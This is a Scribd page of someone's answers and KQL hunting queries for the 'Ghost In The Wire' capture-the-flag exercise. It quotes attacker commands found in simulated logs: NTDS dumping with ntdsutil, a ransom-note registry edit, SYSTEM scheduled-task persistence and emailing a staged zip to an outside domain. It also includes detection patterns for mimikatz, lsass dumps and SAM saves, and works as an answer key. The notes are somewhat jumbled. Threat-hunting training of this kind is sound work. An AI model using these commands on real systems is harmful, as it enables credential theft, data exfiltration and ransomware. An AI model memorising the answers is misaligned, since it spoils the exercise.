Scribd
Upload
9 views7 pages

CJ Walker Ghost

The document details a cybersecurity incident involving threat actors who exfiltrated data related to a secret energy program. Key findings include the use of specific commands for data compression and exfiltration, the number of compromised accounts, and the identification of affected machines. The document also highlights the timeline of events and the usernames associated with compromised accounts.

Uploaded by

bmant794
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as TXT, PDF, TXT or read online on Scribd
9 views7 pages

CJ Walker Ghost

The document details a cybersecurity incident involving threat actors who exfiltrated data related to a secret energy program. Key findings include the use of specific commands for data compression and exfiltration, the number of compromised accounts, and the identification of affected machines. The document also highlights the timeline of events and the usernames associated with compromised accounts.

Uploaded by

bmant794
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as TXT, PDF, TXT or read online on Scribd
You are on page 1/ 7

Ghost In The Wire

Q1

⚠️Warning⚠️: This section is REALLY HARD! Try Rage in the Apocalypse first for a
more reasonable experience

The threat actors exfiltrated data about your secret energy program.

Under what filename did they stage the exfiltration data?

Ans

reg add HKLM\SOFTWARE\Policies\Microsoft\FVE /v RecoveryKeyMessage /t REG_SZ /d "


+-+-+- Your drives are Encrypted! Contact us immediately: killmonger@onionmail.org
-+-+-+" /f
XOGC-DESKTOP

WIP

let _apt_emails =
Email
| where sender in ("org@yandex.com","org_competition@yandex.com")
| distinct reply_to;
let _apt_emls =
Email
| where sender in (_apt_emails) or reply_to in (_apt_emails)
| distinct recipient;
let _apt_host =
Employees
| where email_addr in (_apt_emls);
ProcessEvents
| where hostname in (_apt_emls)
| where process_name has "powershell"

RVFR-MACHINE

let _apt_emails =
Email
| where sender in ("org@yandex.com","org_competition@yandex.com")
| distinct reply_to;
let _apt_emls =
Email
| where sender in (_apt_emails) or reply_to in (_apt_emails)
| distinct recipient;
//let _apt_host =
let _apt_hostname =
Employees
| where email_addr in (_apt_emls)
| distinct hostname;
ProcessEvents
| where hostname in (_apt_hostname)
| where process_name has "powershell"
| where timestamp between (datetime('2323-07-26T11:47:24Z') .. datetime_add('hour',
2, datetime('2323-07-26T11:47:24Z')) )
Email
| where timestamp between (datetime('2323-07-26T11:47:24Z') .. datetime_add('hour',
2, datetime('2323-07-26T11:47:24Z')) )

let _ransomed_hosts=
FileCreationEvents
| where filename has "unlock_your_files.txt"
| distinct hostname;
let _start_time = toscalar(
FileCreationEvents
| where filename has "unlock_your_files.txt"
| order by timestamp asc
| summarize first_time = min(timestamp));
let _end_time = toscalar(
FileCreationEvents
| where filename has "unlock_your_files.txt"
| order by timestamp asc
| summarize first_time = max(timestamp));
ProcessEvents
| where hostname in (_ransomed_hosts)
| where timestamp >= _start_time
| order by hostname , timestamp asc
| project timestamp, process_commandline, process_name, hostname
//| where process_commandline has_any("exfil", ".zip", ".rar", ".dmp", "lsass",
"ntds.dit", ".txt")
//| extend FileName = extract(@"[a-zA-Z]:\\[^ ]+?\.(txt|zip|rar|dmp|dit)", 0,
process_commandline)
//| where isnotempty(FileName) // Only keep rows with extracted filenames
| extend FileName = extract(@"[a-zA-Z]:\\[^ ]+?\.[a-zA-Z0-9]{1,10}", 0,
process_commandline)
| where isnotempty(FileName)
or process_commandline has_any("exfil", "Temp", "Invoke-RestMethod", "http://",
"survival-news.net", "hire.xyz")
| where process_commandline !contains "setup.bat"
| distinct process_commandline

Q1
⚠️Warning⚠️: This section is REALLY HARD! Try Rage in the Apocalypse first for a
more reasonable experience

The threat actors exfiltrated data about your secret energy program.

Under what filename did they stage the exfiltration data?

Ans

Compress-Archive -Path "C:\ScooterEnergyResearch" -DestinationPath "C:\


ScooterEnergyResearch.zip" -Force

ProcessEvents
| where process_commandline contains "powershell"
| distinct process_commandline

ProcessEvents
| where process_commandline contains "powershell"
| where process_commandline contains "Q29tcHJl"
Q2
How many machines (hosts) did the actors exfiltrate data from?

Ans
4

Q3

What command did the threat actor use to gather the data to be exfiltrated?

Ans

Get-ChildItem -Recurse -Force -ErrorAction SilentlyContinue -Filter


*.docx,*.ppt,*.pdf,*.xlsx | ForEach-Object {Copy-Item $_.FullName "C:\
ScooterEnergyResearch"}

let _exfil_host =
ProcessEvents
| where process_commandline contains "powershell"
| where process_commandline contains "Q29tcHJl"
| distinct hostname;
ProcessEvents
| where hostname in (_exfil_host)
| where timestamp between (datetime(2323-07-
30T14:32:24Z) ..datetime_add('hour',1,datetime(2323-07-30T14:32:24Z)) )

Q4

During the staging process, what command did the threat actor use to compress the
exfiltrated data?

Ans

Compress-Archive -Path "C:\ScooterEnergyResearch" -DestinationPath "C:\


ScooterEnergyResearch.zip" -Force

Q5

The threat actors used a command to exfiltrate the data using a common service.

What was the subject?

Send-MailMessage -From "isthisyourking@survival-news.net" -To


"isthisyourking@survival-news.net" -Subject "Game Set Match" -Body "See attached
for goodies" -Attachments "C:\ScooterEnergyResearch.zip"

Q6

What command did the operators use to establish persistence on their victims?

Ans

schtasks /create /sc hourly /tn "IsThisYourKing" /tr "C:\\Windows\\Temp\\


ggwp.exe" /ru SYSTEM

| where process_commandline contains "powershell"


| where process_commandline contains "Q29tcHJl"
| distinct hostname;
ProcessEvents
| where hostname in (_exfil_host)
| where timestamp between (datetime(2323-07-30T14:32:24Z) ..datetime_add('hour', 24
,datetime(2323-07-30T14:32:24Z)) )
| distinct process_commandline

Q7

What command did they use to acquire most of the credentials?

Ans

ntdsutil "ac i ntds "ifm" "create full C:\Windows\Temp\Ntds_dit" q q

ProcessEvents
| where username == "teberry_domain_admin"

let _exfil_host =
ProcessEvents
| where process_commandline contains "powershell"
| where process_commandline contains "Q29tcHJl"
| distinct hostname;
ProcessEvents
| where hostname in (_exfil_host)
| where timestamp between (datetime(2323-07-30T14:32:24Z) ..datetime_add('hour', 24
,datetime(2323-07-30T14:32:24Z)) )
| distinct process_commandline

let _ransomed_hosts=
FileCreationEvents
| where process_name has "unlock_your_files.txt"
| distinct hostname;

let _afected_hosts =
ProcessEvents
| where process_commandline contains "schtasks /create /sc hourly
/tn \"IsThisYourKing\""
| distinct hostname;
ProcessEvents
//| where timestamp >= datetime(2323-07-26T11:47:24Z)
//| where hostname in (_afected_hosts)
| where process_commandline has_any ("procdump", "rundll32.exe", "comsvcs.dll",
"ntdsutil", "mimikatz", "reg save", "sam", "security", "system")
or process_name in ("procdump.exe", "mimikatz.exe", "rundll32.exe",
"ntdsutil.exe", "reg.exe")
| where process_commandline !has "--system-initiated"
| distinct process_commandline
| where
// 1. WDigest Registry Modification
(process_name == "reg.exe"
and process_commandline has_any ("add", "HKLM\\SYSTEM\\CurrentControlSet\\
Control\\SecurityProviders\\WDigest", "UseLogonCredential", "/d 1"))
// 2. LSASS Dump with rundll32 and comsvcs.dll
or (process_name == "rundll32.exe"
and process_commandline has_any ("comsvcs.dll", "MiniDump")
and process_commandline has_any (".dmp", "ssasl", "lsass")) // Look for
dump files or reversed "lsass"
// 3. New User Creation (DefaultAccount)
or (process_name == "net.exe"
and process_commandline has_any ("user", "DefaultAccount", "/add"))
// 4. SAM Hive Dump
or (process_name == "reg.exe"
and process_commandline has_any ("save", "HKLM\\SAM"))
// 5. PowerShell Mimikatz Download (optional, less common)
or (process_name == "powershell.exe"
and process_commandline has_any ("IEX", "Invoke-Mimikatz",
"DownloadString"))
or process_commandline has_any ("procdump", "comsvcs", "taskmgr", "ntdsutil",
"mimikatz", "reg save", "reg", "save")
| distinct process_commandline

Q8

But first, they had to compromise a crucial account.

What was the username linked to that account?

Ans

teberry_domain_admin DOMAIN_CONTROLLER_01 2323-07-30T14:46:26Z

AuthenticationEvents
| where result == "Successful Login"
| extend type = tostring(split(hostname, '-')[-1])
| where type has "DOMAIN_CONTROLLER_01"

Q9

They compromised the account in question 8 via another compromised user.

What is their username?

Ans

jodrahota XCMX-MACHINE 10.10.2.180

OAMX-MACHINE

let _comp_hsts =
Authenticjodrahota
ationEvents
| where username == "teberry_domain_admin"
| distinct hostname;
Employees
| where hostname in (_comp_hsts)

Q10

When did the threat actor compromise the account in question 8?

Ans

2323-07-30T15:29:43Z

ProcessEvents
| where username == "teberry_domain_admin"

Q12

Using this initial access vector, how many accounts did the actors target?

Ans
718

let _emp_agent =
Employees
| where username == "biharrell"
| distinct user_agent;
let _apt_agent=
AuthenticationEvents
| where username == "biharrell"
| where user_agent !in (_emp_agent)
| where result == "Successful Login"
| distinct user_agent;
AuthenticationEvents
| where user_agent in (_apt_agent)
//| where result == "Successful Login"
| distinct username

Q13
How many accounts did the actors compromise?

Ans

46

let _emp_agent =
Employees
| where username == "biharrell"
| distinct user_agent;
let _apt_agent=
AuthenticationEvents
| where username == "biharrell"
| where user_agent !in (_emp_agent)
| where result == "Successful Login"
| distinct user_agent;
AuthenticationEvents
| where user_agent in (_apt_agent)
| where result == "Successful Login"
| distinct username

Q14

The threat actor leveraged a machine they had already compromised to use the
"crucial" credentials. Which user did this machine belong to? (Provide their
username.)

Ans
biharrell

let _comp_hsts =
AuthenticationEvents
| where username == "teberry_domain_admin"
| distinct src_ip;
Employees
| where ip_addr in (_comp_hsts)

Q15
When did the threat actor compromise the account of the user identified in question
14?

Ans

2323-06-22T11:33:58Z

let _emp_agent =
Employees
| where username == "biharrell"
| distinct user_agent;
AuthenticationEvents
| where username == "biharrell"
| where user_agent !in (_emp_agent)

You might also like